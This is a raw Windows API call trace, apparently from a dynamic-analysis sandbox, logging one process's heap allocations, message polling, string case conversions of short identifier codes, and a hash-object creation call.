[0198.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0198.323] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0198.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0198.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.324] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0198.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0198.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.324] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0198.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0198.325] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0198.325] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0198.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0198.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.326] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.326] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0198.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0198.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0198.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0198.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.327] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0198.328] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.328] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0198.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0198.328] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0198.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0198.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0198.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.328] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0198.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0198.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0198.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0198.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0198.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0198.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0198.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0198.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0198.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0198.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0198.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0198.329] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0198.329] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.330] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0198.330] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.330] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.330] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.330] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.330] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.330] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.331] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.331] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.331] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0198.331] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0198.331] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.331] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0198.331] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.331] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.332] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.332] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.332] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0198.332] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0198.332] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.332] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0198.333] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.333] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.333] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0198.333] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0198.333] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0198.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.333] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0198.333] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.334] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0198.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.334] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0198.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0198.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.334] CryptCreateHash (in: hProv=0xad6480, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0198.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0198.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 